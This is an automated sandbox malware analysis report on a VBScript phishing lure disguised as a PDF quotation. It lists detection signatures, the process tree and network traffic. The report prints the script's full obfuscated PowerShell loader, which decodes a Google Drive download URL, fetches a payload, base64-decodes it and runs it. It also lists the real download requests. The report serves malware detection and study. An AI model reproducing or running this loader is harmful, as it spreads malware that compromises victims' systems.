
Windows Analysis Report
Urgent Quotation Notification_pdf.vbs

Overview

General Information

Sample name: Urgent Quotation Notification_pdf.vbs
Analysis ID: 1522522
MD5: 9399cd1db4c7360b891ecc977dfbdc2a
SHA1: 968f602adcb6c30b6a6f3520bf90f17d9511e7c7
SHA256: ee0a0898ddb59aa40d7c429d982e56a1ca4847a2872b857a1a3934d316075576
Tags: vbs, user-abuse_ch

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
AI detected suspicious sample
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

  • System is w10x64
  • wscript.exe (PID: 7592 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Quotation Notification_pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7752 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Cantharidating Desinficerer afgrdernes Mistakenly Bunsen spadestres #>;$Befleaing='subclans';<#Opinionsdannelserne leia Entomophthorous Hedninger #>;$Essens=$host.PrivateData;If ($Essens) {$Becollier++;}function Fabrikskomplekserne($syngespil){$Brace66=$Frafaldendes+$syngespil.Length-$Becollier;for( $Acuserl=3;$Acuserl -lt $Brace66;$Acuserl+=4){$stevedorerne+=$syngespil[$Acuserl];}$stevedorerne;}function Trolddomskunsternes($Pretabulation){ . ($Untenseness) ($Pretabulation);}$Plattenslager=Fabrikskomplekserne 'DimMsejoDehzsanimetlAntlE.sa a/spi5Unr.Ga 0.ka Wax( K,WAntiPann PodRumoa awIdisAlm t N reT Me Lea1Fil0Fel.ska0si.;fje TrtW.emi G,nCry6Cla4Tan; ,p staxNot6 ra4 Il;Pe Pr r AlvTin:Nya1I t2Ou 1.mt.Bio0Ret)Ice AcGOvee Elc TokF do Mi/met2Fli0 nf1 ,h0Ren0 ta1 nd0 B 1 ar AalFsemiHalrPave vef FioW.ax Il/Tun1As.2 ri1sna. t0Hvi ';$Unentailed=Fabrikskomplekserne ' F.U ,ns alEGr REks-sarABebg EleMa nTipTRes ';$Certifiability=Fabrikskomplekserne ' GehRe t Unt hpFe sFum:Brn/Che/OpddEjerLydi CovJaze nu.,ragA eo CaoMilg ,elB,sesha. .oc.olo,oemFed/ P.u P cNo.?Po e.etxmedpKo o Puras.tMa =VaadFinoFngwMe.nUnll s oTe.a nodPre& igiRidd ar=,la1CluTserFTegXOnyc.fdrPreJP eWOutTD.yGPjamLysaEvic Na2Gr hElejO r-DevV Trsm dL.aro,idWcepxDisw ,es f.sseskBi gUnoBstv1tor7M g6Gyls G. 
';$Tilskringskursuset=Fabrikskomplekserne 'F.b>Lac ';$Untenseness=Fabrikskomplekserne ' UniTinEEn xDo ';$Remburserne='Kohoveder';$bakie='\Bumpenes.sam';Trolddomskunsternes (Fabrikskomplekserne 'Tre$ Teg mbl Hao mmb anaLomlsk :EndDFesuvoltFr,itr.aVacb Bll eePo =Mon$ lae Pan upvPre:Ka as,mpMisp CodOrdaRaatBaraTek+ De$EkkbD aa rak uniBroeO d ');Trolddomskunsternes (Fabrikskomplekserne 'Tan$,ksgD al FooAnnbBl a Hylpha: KaP Torpolel,di Almbelp vo ndrGartBle=sup$LimC eveprorApptsayiza f ai .kaFisbFaliOrnlChaiHyptWriyTen.CarsProp MilTeli ExtP l(Pai$PraTd.wivesl O.s HuksamrFo iCaln Zog scstilkPosuB.drs tsBa u TosPr.e aftBla)B l ');Trolddomskunsternes (Fabrikskomplekserne 'Mol[.erN.ocePret.tu.Angs tre,iarsmevHumiFe cgrues,rP ao lmiLevnDeft MoMsu aCasn ska olgslieB.yrAdn] Wr:Gth:BrssFree T cUnmu,anrYppi nttsvey InPChirbriostitOutoRifcMejotyrl Fo Bof= st ,ys[In.NUboeD.rtTpp.s ossofeOvecUnduN,tr Fri et ubyAfvPBjerKofoKretUnaowitcMatoKinlskrTGluyskipPosesal]A i: ej:Y uT oclObjs Kv1sym2Mas ');$Certifiability=$Preimport[0];$Fortolke=(Fabrikskomplekserne ' re$BlagstaLsano arBMulasjkLKon:GenC BrhMo,a.nnN asn,ndiPoleLe.=ComNb teHooW .i-sp osneBUdnjacce asCArkTKas UbesB uYCams CeTMune dsMTra.sp,nmisEposT De. 
nowBereNonb LycNonl,isIBrieHusN Hjtopf ');Trolddomskunsternes ($Fortolke);Trolddomskunsternes (Fabrikskomplekserne 'lug$,nkCHyphPreaEnenBa.ns,ei MieAnt.VivHK,nes raAt,d GyeC xr UdsFel[ st$NynULymnFleeIn.n ontRe aUnoi AclBeeeFord Ac]Ani=sk $TrkPUrelsataFe.tBentinteKg.n ytsicilIrras,igDrme CerHol ');$Bufferkapaciteterne=Fabrikskomplekserne 'Unp$ DaCDeph.araBilnCoan raiInteD,m.UndDstao riwse,nU.plMuso taaR td .nFRddi llskye l(Mal$tunCIndeT.ar ottKomiC nf aiDraaa ob ckiAcilUnniTartUnfyske, no$RatP crrPraoOffsD etKvah anoKondBaaosprnstitOphi occ msAlt) ed ';$Prosthodontics=$Dutiable;Trolddomskunsternes (Fabrikskomplekserne 'Mil$Oveg BalHngoFotbPrma oL Pr:,acs stI .hdCouOundN snIMa a B sH,u= En( CotHjuesttsUnsTExi-KispRaaaCout skHRag Ebu$,omP ierK.io HusLant enHT kOTredD rO Brnsk,TAutIUn c PasHa,) Re ');while (!$sidonias) {Trolddomskunsternes (Fabrikskomplekserne ' K $Gafghkels ioPolbIntasinl.el:El U Dossvrl stiTign TigEtheMk,nUn s Kl=To $stot erM au sye Af ') ;Trolddomskunsternes $Bufferkapaciteterne;Trolddomskunsternes (Fabrikskomplekserne 'V lssoat MiaMatrBettf,j-WatsNislsike svePlepFas Epi4Chi ');Trolddomskunsternes (Fabrikskomplekserne 'F g$P.rgC llGaloHarb C.aItal Fo: G.sBloiHypd aso A,n,tai Nua OvsDem=Clu( ,rTD teAn seartFll-WogPId,aUndtn th su Ild$UnsPCl rBetosprsMyttslah o,oLordUbeoKupnGrotO eiKo cTrisG i)Kah ') ;Trolddomskunsternes (Fabrikskomplekserne 'squ$Audg EilB.aoBorbFesaIn lFac: coOs.rrAf tDewhP ro MacKape dsrE.ta FltKeliIsotErki llc ro= k$ U gse l s os jb osa llBow: UnU Kanra dWeaeBharslucTrarundoPlasVissZoni PsnMedgjus+Bi,+ Al% yp$B sP esrHareForiEvim ncpOpsostar Retdat.HvicDrno FiuI pnReotRec ') ;$Certifiability=$Preimport[$Orthoceratitic];}$Vejlenser=275493;$Cirkelines=30624;Trolddomskunsternes (Fabrikskomplekserne 'For$ FegtimlBraoKilbGolaOlalTo.:s nM ElaCorsHelsOveeWeitsm eOver PriFascpep Tra=Epi AnGRapesemtMus-HovCMauoho,nRevt steVinnAcatMel B r$tykPQu,r.haoBlusB at Rah CyoFlidsuioPron hltO,ei stc isLyk ');Trolddomskunsternes (Fabrikskomplekserne 
'Ine$AlagGtel,enoHygb MraNeglClo:CanIdiansolfTr i PrnChaisrktUn.aBehtAfseP ad su l=N g ,jl[Be s,awyChisTuntsl,eNydm sp. ArCvero usnNonvFuteA.erAt tper]ski:Vej:TofFLetrKomoPremVarBEntaUdtsElseFes6 lu4 B sstitcsnrfugistrnsvegDri(Fra$UnsMKisaTassTo.sBraeWhatNyaes.orMusi ascVer) Bo ');Trolddomskunsternes (Fabrikskomplekserne ' dr$BefgsvilHeao ocb p.aBealZi :Un MR ko HyncesiUn s,ontPeli Fos R kOl e .v D g=dor Xip[UdhsV zyGuasB ktPhyeRapmObj.st TFo,e Rux tetGra. MoEMisn Glcstao ldD ni stnFusgbor]ent:kom: emAn nsBasCHe It aIGon. G,GItae sttAl,sburtJusr M.iUdsns mg e( As$ aIK in opfBini.efnsemiflet EfaUndt laesmud.in) Dr ');Trolddomskunsternes (Fabrikskomplekserne 'Brb$D,igB nlPreoHurb,oraRealUni: rTAngrTrao K,u Mev,oie rluPyrrGarsodi1 In5Me,6,ct=sol$AllMB yo O n I i.yrss otNseibagsAp.kopbeMoo. ndsAp usaubin sDiatVanr BoiHosnTe.gAfr(Cra$ProVsyne OdjKonlHjee.ilnDe sToge Norsat,afh$damC W iGe r Miksoge L lGauiBranjobeIn s as)Pen ');Trolddomskunsternes $Trouveurs156;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 7752 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi64_7752.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

      System Summary

      Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Quotation Notification_pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Quotation Notification_pdf.vbs", CommandLine|base64offset|contains: B-j, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Quotation Notification_pdf.vbs", ProcessId: 7592, ProcessName: wscript.exe
      Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Quotation Notification_pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Quotation Notification_pdf.vbs", CommandLine|base64offset|contains: B-j, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Quotation Notification_pdf.vbs", ProcessId: 7592, ProcessName: wscript.exe
      Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Cantharidating Desinficerer afgrdernes Mistakenly Bunsen spadestres #>;$Befleaing='subclans';<#Opinionsdannelserne leia Entomophthorous Hedninger #>;$Essens=$host.PrivateData;If ($Essens) {$Becollier++;}function Fabrikskomplekserne($syngespil){$Brace66=$Frafaldendes+$syngespil.Length-$Becollier;for( $Acuserl=3;$Acuserl -lt $Brace66;$Acuserl+=4){$stevedorerne+=$syngespil[$Acuserl];}$stevedorerne;}function Trolddomskunsternes($Pretabulation){ . ($Untenseness) ($Pretabulation);}$Plattenslager=Fabrikskomplekserne 'DimMsejoDehzsanimetlAntlE.sa a/spi5Unr.Ga 0.ka Wax( K,WAntiPann PodRumoa awIdisAlm t N reT Me Lea1Fil0Fel.ska0si.;fje TrtW.emi G,nCry6Cla4Tan; ,p staxNot6 ra4 Il;Pe Pr r AlvTin:Nya1I t2Ou 1.mt.Bio0Ret)Ice AcGOvee Elc TokF do Mi/met2Fli0 nf1 ,h0Ren0 ta1 nd0 B 1 ar AalFsemiHalrPave vef FioW.ax Il/Tun1As.2 ri1sna. t0Hvi ';$Unentailed=Fabrikskomplekserne ' F.U ,ns alEGr REks-sarABebg EleMa nTipTRes ';$Certifiability=Fabrikskomplekserne ' GehRe t Unt hpFe sFum:Brn/Che/OpddEjerLydi CovJaze nu.,ragA eo CaoMilg ,elB,sesha. .oc.olo,oemFed/ P.u P cNo.?Po e.etxmedpKo o Puras.tMa =VaadFinoFngwMe.nUnll s oTe.a nodPre& igiRidd ar=,la1CluTserFTegXOnyc.fdrPreJP eWOutTD.yGPjamLysaEvic Na2Gr hElejO r-DevV Trsm dL.aro,idWcepxDisw ,es f.sseskBi gUnoBstv1tor7M g6Gyls G. 
';$Tilskringskursuset=Fabrikskomplekserne 'F.b>Lac ';$Untenseness=Fabrikskomplekserne ' UniTinEEn xDo ';$Remburserne='Kohoveder';$bakie='\Bumpenes.sam';Trolddomskunsternes (Fabrikskomplekserne 'Tre$ Teg mbl Hao mmb anaLomlsk :EndDFesuvoltFr,itr.aVacb Bll eePo =Mon$ lae Pan upvPre:Ka as,mpMisp CodOrdaRaatBaraTek+ De$EkkbD aa rak uniBroeO d ');Trolddomskunsternes (Fabrikskomplekserne 'Tan$,ksgD al FooAnnbBl a Hylpha: KaP Torpolel,di Almbelp vo ndrGartBle=sup$LimC eveprorApptsayiza f ai .kaFisbFaliOrnlChaiHyptWriyTen.CarsProp MilTeli ExtP l(Pai$PraTd.wivesl O.s HuksamrFo iCaln Zog scstilkPosuB.drs tsBa u TosPr.e aftBla)B l ');Trolddomskunsternes (Fabrikskomplekserne 'Mol[.erN.ocePret.tu.Angs tre,iarsmevHumiFe cgrues,rP ao lmiLevnDeft MoMsu aCasn ska olgslieB.yrAdn] Wr:Gth:BrssFree T cUnmu,anrYppi nttsvey InPChirbriostitOutoRifcMejotyrl Fo Bof= st ,ys[In.NUboeD.rtTpp.s ossofeOvecUnduN,tr Fri et ubyAfvPBjerKofoKretUnaowitcMatoKinlskrTGluyskipPosesal]A i: ej:Y uT oclObjs Kv1sym2Mas ');$Certifiability=$Preimport[0];$Fortolke=(Fabrikskomplekserne ' re$BlagstaLsano arBMulasjkLKon:GenC BrhMo,a.nnN asn,ndiPoleLe.=ComNb teHooW .i-sp osneBUdnjacce asCArkTKas UbesB uYCams CeTMune dsMTra.sp,nmisEposT De. nowBereNonb LycNonl,isIBrieHusN Hjtopf ');Trolddomskunsternes ($Fortolke);Trolddomskunsternes (Fabrikskomplekserne 'lug$,nkCHyphPreaEnenBa.ns,ei MieAnt.VivHK,nes raAt,d GyeC xr UdsFel[ st$NynULymnFleeIn.n ontRe aUnoi AclBeeeFord Ac]Ani=sk $TrkPUrelsataFe.tBentinteKg.n ytsicilIrras,igDrme CerHol ');$Bufferkapaciteterne=Fabrikskomplekserne 'Unp$ DaCDeph.araBilnCoan raiInteD,m.UndDstao riwse,nU.plMuso taaR td .nFRddi llskye l(Mal$tunCI
      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-09-30T09:58:13.830927+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.9 | 49710 | 142.250.186.33 | 443 | TCP
      2024-09-30T09:58:29.041282+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.9 | 49716 | 142.250.186.174 | 443 | TCP
      2024-09-30T09:58:54.549717+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.9 | 57672 | 142.250.186.174 | 443 | TCP
      2024-09-30T09:59:04.582563+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.9 | 57674 | 142.250.186.174 | 443 | TCP
      2024-09-30T09:59:30.054853+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.9 | 57680 | 142.250.186.174 | 443 | TCP
      2024-09-30T09:59:41.117471+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.9 | 57682 | 142.250.186.174 | 443 | TCP


      AV Detection

      Source: Submited Sample | Integrated Neural Analysis Model: Matched 99.0% probability
      Source: unknown | HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.9:49707 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.9:49708 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.9:49719 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.9:57674 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.9:57685 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.9:57686 version: TLS 1.2
      Source: Binary string: ystem.pdb source: powershell.exe, 00000002.00000002.2635802751.000001D676AE9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: CallSite.Targetore.pdbP source: powershell.exe, 00000002.00000002.2635802751.000001D676AB9000.00000004.00000020.00020000.00000000.sdmp

      Software Vulnerabilities

      Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download HTTP/1.1Host: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:57674 -> 142.250.186.174:443
      Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49710 -> 142.250.186.33:443
      Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:57682 -> 142.250.186.174:443
      Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49716 -> 142.250.186.174:443
      Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:57672 -> 142.250.186.174:443
      Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:57680 -> 142.250.186.174:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download HTTP/1.1Host: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: powershell.exe, 00000002.00000002.2637094690.000001D676E0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: app-measurement-cn.com*.app-measurement-cn.comgvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netgoogleflights-cn.net*.googleflights-cn.netadmob-cn.com*.admob-cn.comgooglesandbox-cn.com*.googlesandbox-cn.com*.safenup.googlesandbox-cn.com*.gstatic.com*.metric.gstatic.com*.gvt1.com*.gcpcdn.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.commusic.youtube.com*.music.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.com*.android.google.cn*.chrome.google.cn*.developers.google.cn""6 equals www.youtube.com (Youtube)
      Source: global traffic | DNS traffic detected: DNS query: drive.google.com
      Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
